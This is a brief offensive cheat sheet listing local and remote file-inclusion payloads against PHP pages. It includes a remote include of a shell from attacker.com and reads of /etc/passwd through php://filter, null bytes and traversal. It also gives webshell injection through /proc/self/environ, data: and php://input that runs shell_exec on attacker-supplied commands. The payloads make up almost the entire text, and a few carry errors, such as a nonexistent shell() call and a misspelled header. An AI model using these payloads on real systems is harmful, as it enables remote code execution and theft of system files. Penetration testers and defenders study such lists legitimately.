Getting started with LFI and RFI

Getting started with LFI and RFI

1. Direct File Include:

http://site.com/lfi.php?page=/etc/passwd
http://www.site.com/rfi.php?page=http://attacker.com/shell.txt

2. php://filter:

http://www.site.com/lfi.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

3. /proc/self/environ:

GET /lfi.php?page=/proc/self/environ&c=id HTTP/1.1
Host: www.site.com
User-Agent: <?php echo shell($_GET['c']);?>

4. Zip and Phar wrappers:

http://www.site.com/lfi.php?page=zip://image.zip#shell.php
http://www.site.com/lfi.php?page=phar://image.phar#shell.php

5. Data:text/plain:

http://www.site.com/lfi.php?page=data:text/plain;base64,PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7Pz4=

6. php://input:

POST /lfi.php?page=php://input&c=cd HTTP/1.1
Host: www.site.com
Content-Lenth: 37

<?php echo shell_exec($_GET['c']);?>

7. Null Bytes:

http://www.site.com/lfi.php?page=/etc/passwd%00

8. Truncation:

http://www.site.com/lfi.php?page=../../../../../../../../../../../../etc/passwd
http://www.site.com/lfi.php?page=/etc/passwd.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
Sanoj Kumar

Sanoj Kumar